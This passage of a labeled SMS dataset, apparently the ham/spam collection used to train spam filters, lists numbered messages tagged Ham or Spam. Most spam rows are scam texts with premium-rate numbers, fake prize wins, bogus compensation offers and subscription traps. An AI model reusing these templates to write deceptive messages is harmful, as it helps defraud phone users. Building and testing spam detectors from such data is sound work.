4u a couple times. Who all's coming? 395 | Ham Just woke up. Yeesh its late. But I didn't fall asleep til <#> am :/ 396 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094565 397 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q? 398 | Spam "FREE RING TONE just text ""POLYS"" to 87131. Then every week get a new tone. 0870737910216yrs only £1.50/wk." 399 | Ham Ok can... 400 | Spam Get ur 1st RINGTONE FREE NOW! Reply to this msg with TONE. 
Gr8 TOP 20 tones to your phone every week just £1.50 per wk 2 opt out send STOP 08452810071 16 401 | Spam Get a brand new mobile phone by being an agent of The Mob! Plus loads more goodies! For more info just text MAT to 87021. 402 | Ham I sent them. Do you like? 403 | Ham Good. do you think you could send me some pix? I would love to see your top and bottom... 404 | Ham I accidentally brought em home in the box 405 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days. 406 | Ham S....s...india going to draw the series after many years in south african soil.. 407 | Spam IMPORTANT MESSAGE. This is a final contact attempt. You have important messages waiting out our customer claims dept. Expires 13/4/04. Call 08717507382 NOW! 408 | Ham You'd like that wouldn't you? Jerk! 409 | Ham How long does it take to get it. 410 | Spam Our records indicate u maybe entitled to 5000 pounds in compensation for the Accident you had. To claim 4 free reply with CLAIM to this msg. 2 stop txt STOP 411 | Ham Oh:)as usual vijay film or its different? 412 | Ham Tmr then ü brin lar... Aiya later i come n c lar... Mayb ü neva set properly ü got da help sheet wif ü... 413 | Spam Loan for any purpose £500 - £75,000. Homeowners + Tenants welcome. Have you been previously refused? We can still help. Call Free 0800 1956669 or text back 'help' 414 | Ham So li hai... Me bored now da lecturer repeating last weeks stuff waste time... 415 | Spam cmon babe, make me horny, *turn* me on! Txt me your fantasy now babe -) Im hot, sticky and need you now. All replies cost £1.50. 2 cancel send STOP 416 | Spam Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk 417 | Ham Oh great. I.ll disturb him more so that we can talk. 418 | Ham I have 2 sleeping bags, 1 blanket and paper and phone details. Anything else? 419 | Spam URGENT! 
You have won a 1 week FREE membership in our £100,000 Prize Jackpot! Txt the word: CLAIM to No: 81010 T&C www.dbuk.net LCCLTD POBOX 4403LDNW1A7RW18 420 | Ham Great! So what attracts you to the brothas? 421 | Ham My supervisor find 4 me one lor i thk his students. I havent ask her yet. Tell u aft i ask her. 422 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+ 423 | Ham O we cant see if we can join denis and mina? Or does denis want alone time 424 | Spam Can U get 2 phone NOW? I wanna chat 2 set up meet Call me NOW on 09096102316 U can cum here 2moro Luv JANE xx Calls£1/minmoremobsEMSPOBox45PO139WA 425 | Ham Jordan got voted out last nite! 426 | Ham Tomarrow i want to got to court. At <DECIMAL> . So you come to bus stand at 9. 427 | Ham I dont thnk its a wrong calling between us 428 | Spam Congratulations - Thanks to a good friend U have WON the £2,000 Xmas prize. 2 claim is easy, just call 08712103738 NOW! Only 10p per minute. BT-national-rate 429 | Ham I could ask carlos if we could get more if anybody else can chip in 430 | Ham You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later. 431 | Spam important information 4 orange user 0789xxxxxxx. today is your lucky day!2find out why log onto http://www.urawinner.com THERE'S A FANTASTIC SURPRISE AWAITING YOU! 432 | Spam New TEXTBUDDY Chat 2 horny guys in ur area 4 just 25p Free 2 receive Search postcode or at gaytextbuddy.com. TXT ONE name to 89693 433 | Spam Guess what! Somebody you know secretly fancies you! Wanna find out who it is? Give us a call on 09065394514 From Landline DATEBox1282EssexCM61XN 150p/min 18 434 | Ham I'm home... 435 | Spam GSOH? Good with SPAM the ladies?U could b a male gigolo? 2 join the uk's fastest growing mens club reply ONCALL. mjzgroup. 08714342399.2stop reply STOP. 
msg@£1.50rcvd 436 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply 437 | Spam URGENT! Last weekend's draw shows that you have won £1000 cash or a Spanish holiday! CALL NOW 09050000332 to claim. T&C: RSTM, SW7 3SS. 150ppm 438 | Ham My Parents, My Kidz, My Friends n My Colleagues. All screaming.. SURPRISE !! and I was waiting on the sofa.. ... ..... ' NAKED...! 439 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712412 between 10am-7pm Cost 10p 440 | Spam Had your mobile 11mths ? Update for FREE to Oranges latest colour camera mobiles & unlimited weekend calls. Call Mobile Upd8 on freefone 08000839402 or 2StopTx 441 | Spam Reply to win £100 weekly! Where will the 2006 FIFA World Cup be held? Send STOP to 87239 to end service 442 | Ham Ok i vl..do u know i got adsense approved.. 443 | Spam 88800 and 89034 are premium phone services call 08718711108 444 | Spam Hi this is Amy, we will be sending you a free phone number in a couple of days, which will give you an access to all the adult parties... 445 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ? 446 | Spam Your credits have been topped up for http://www.bubbletext.com Your renewal Pin is tgxxrz 447 | Ham ALSO TELL HIM I SAID HAPPY BIRTHDAY 448 | Ham Cheers for the card ... Is it that time of year already? 449 | Spam Refused a loan? Secured or Unsecured? Can't get credit? Call free now 0800 195 6669 or text back 'help' & we will! 450 | Spam Last Chance! Claim ur £150 worth of discount vouchers today! Text SHOP to 85023 now! SavaMob, offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Sub. 16 451 | Ham Goodmorning today i am late for <DECIMAL> min. 
452 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s 453 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm 454 | Spam HMV BONUS SPECIAL 500 pounds of genuine HMV vouchers to be won. Just answer 4 easy questions. Play Now! Send HMV to 86688 More info:www.100percent-real.com 455 | Spam Natalja (25/F) is inviting you to be her friend. Reply YES-440 or NO-440 See her: www.SMS.ac/u/nat27081980 STOP? Send STOP FRND to 62468 456 | Spam This is the 2nd attempt to contract U, you have won this weeks top prize of either £1000 cash or £200 prize. Just call 09066361921 457 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply 458 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09061744553 now! videochat wid ur mates, play java games, Dload polyH music, noline rentl. bx420. ip4. 5we. 150pm 459 | Ham "Edison has rightly said, ""A fool can ask more questions than a wise man can answer"" Now you know why all of us are speechless during ViVa.. GM,GN,GE,GNT:-)" 460 | Ham This pen thing is beyond a joke. Wont a Biro do? Don't do a masters as can't do this ever again! 461 | Spam You are awarded a SiPix Digital Camera! call 09061221061 from landline. Delivery within 28days. T Cs Box177. M221BP. 2yr warranty. 150ppm. 16 . p p£3.99 462 | Ham Hey u still at the gym? 463 | Spam 44 7732584351, Do you want a New Nokia 3510i colour phone DeliveredTomorrow? With 300 free minutes to any mobile + 100 free texts + Free Camcorder reply or call 08000930705. 464 | Ham My friend, she's studying at warwick, we've planned to go shopping and to concert tmw, but it may be canceled, havn't seen for ages, yeah we should get together sometime! 465 | Ham BABE !!! 
I miiiiiiissssssssss you ! I need you !!! I crave you !!! :-( ... Geeee ... I'm so sad without you babe ... I love you ... 466 | Ham Aiyo... U always c our ex one... I dunno abt mei, she haven reply... First time u reply so fast... Y so lucky not workin huh, got bao by ur sugardad ah...gee.. 467 | Spam FreeMsg: Claim ur 250 SMS messages-Text OK to 84025 now!Use web2mobile 2 ur mates etc. Join Txt250.com for 1.50p/wk. T&C BOX139, LA32WU. 16 . Remove txtX or stop 468 | Ham Joy's father is John. Then John is the ____ of Joy's father. If u ans ths you hav <#> IQ. Tis s IAS question try to answer. 469 | Ham I get out of class in bsn in like <#> minutes, you know where advising is? 470 | Spam accordingly. I repeat, just text the word ok on your mobile phone and send 471 | Spam CALL 09090900040 & LISTEN TO EXTREME DIRTY LIVE CHAT GOING ON IN THE OFFICE RIGHT NOW TOTAL PRIVACY NO ONE KNOWS YOUR [sic] LISTENING 60P MIN 24/7MP 0870753331018+ 472 | Spam WIN a year supply of CDs 4 a store of ur choice worth £500 & enter our £100 Weekly draw txt MUSIC to 87066 Ts&Cs www.Ldew.com.subs16+1win150ppmx3 473 | Spam FreeMsg Hey there darling it's been 3 week's now and no word back! I'd like some fun you up for it still? Tb ok! XxX std chgs to send, £1.50 to rcv 474 | Spam Hard LIVE 121 chat just 60p/min. Choose your girl and connect LIVE. Call 09094646899 now! Cheap Chat UK's biggest live service. VU BCM1896WC1N3XX 475 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize! 476 | Spam You won't believe it but it's true. It's Incredible Txts! Reply G now to learn truly amazing things that will blow your mind. From O2FWD only 18p/txt 477 | Spam Someonone you know is trying to contact you via our dating service! To find out who it could be call from your mobile or landline 09064015307 BOX334SK38ch 478 | Ham Hey... Thk we juz go accordin to wat we discussed yest lor, except no kb on sun... 
Cos there's nt much lesson to go if we attend kb on sat... 479 | Ham Aight, I'll text you when I'm back 480 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16 481 | Ham Or I guess <#> min 482 | Ham Awesome, I remember the last time we got somebody high for the first time with diesel :V 483 | Spam Ur cash-balance is currently 500 pounds - to maximize ur cash-in now send GO to 86688 only 150p/meg. CC: 08718720201 HG/Suite342/2lands Row/W1j6HL 484 | Ham Hi ....My engagement has been fixd on <#> th of next month. I know its really shocking bt....hmm njan vilikkam....t ws al of a sudn;-(. 485 | Ham What's up my own oga. Left my phone at home and just saw ur messages. Hope you are good. Have a great weekend. 486 | Ham Alright. I'm out--have a good night! 487 | Spam "For your chance to WIN a FREE Bluetooth Headset then simply reply back with ""ADP""" 488 | Spam Free 1st week entry 2 TEXTPOD 4 a chance 2 win 40GB iPod or £250 cash every wk. Txt POD to 84128 Ts&Cs www.textpod.net custcare 08712405020. 489 | Spam Todays Voda numbers ending with 7634 are selected to receive a £350 reward. If you have a match please call 08712300220 quoting claim code 7684 standard rates apply. 490 | Ham Just got to <#> 491 | Ham Oh...i asked for fun. Haha...take care. ü 492 | Spam "You can stop further club tones by replying ""STOP MIX"" See my-tone.com/enjoy. html for terms. Club tones cost GBP4.50/week. MFL, PO Box 1146 MK45 2WT (2/3)" 493 | Ham We have pizza if u want 494 | Ham Tee hee. Off to lecture, cheery bye bye. 495 | Spam We tried to contact you re our offer of New Video Phone 750 anytime any network mins HALF PRICE Rental camcorder call 08000930705 or reply for delivery Wed 496 | Spam Someone has contacted our dating service and entered your phone because they fancy you! To find out who it is call from a landline 09111032124 . 
PoBox12n146tf150p 497 | Ham Good afternoon, my love. It was good to see your words on YM and get your tm. Very smart move, my slave ... *smiles* ... I drink my coffee and await you. 498 | Spam SMS AUCTION You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+ 499 | Spam 2p per min to call Germany 08448350055 from your BT line. Just 2p per min. Check PlanetTalkInstant.com for info & T's & C's. Text stop to opt out 500 | Ham Yup. Izzit still raining heavily cos i'm in e mrt i can't c outside. 501 | Ham Are you this much buzy 502 | Spam UR GOING 2 BAHAMAS! CallFREEFONE 08081560665 and speak to a live operator to claim either Bahamas cruise of£2000 CASH 18+only. To opt out txt X to 07786200117 503 | Spam it to 80488. Your 500 free text messages are valid until 31 December 2005. 504 | Ham Goodmorning, today i am late for <DECIMAL> min. 505 | Ham Pls send me a comprehensive mail about who i'm paying, when and how much. 506 | Ham Heart is empty without love.. Mind is empty without wisdom.. Eyes r empty without dreams & Life is empty without frnds.. So Alwys Be In Touch. Good night & sweet dreams 507 | Spam U are subscribed to the best Mobile Content Service in the UK for £3 per ten days until you send STOP to 83435. Helpline 08706091795. 508 | Spam Congratulations U can claim 2 VIP row A Tickets 2 C Blu in concert in November or Blu gift guaranteed Call 09061104276 to claim TS&Cs www.smsco.net cost£3.75max 509 | Ham I had a good time too. Its nice to do something a bit different with my weekends for a change. See ya soon 510 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222. 511 | Ham I wnt to buy a BMW car urgently..its vry urgent.but hv a shortage of <#> Lacs.there is no source to arng dis amt. <#> lacs..thats my prob 512 | Spam You have won a Nokia 7250i. 
This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+ 513 | Spam Promotion Number: 8714714 - UR awarded a City Break and could WIN a £200 Summer Shopping spree every WK. Txt STORE to 88039 . SkilGme. TsCs087147403231Winawk!Age16 £1.50perWKsub 514 | --------------------------------------------------------------------------------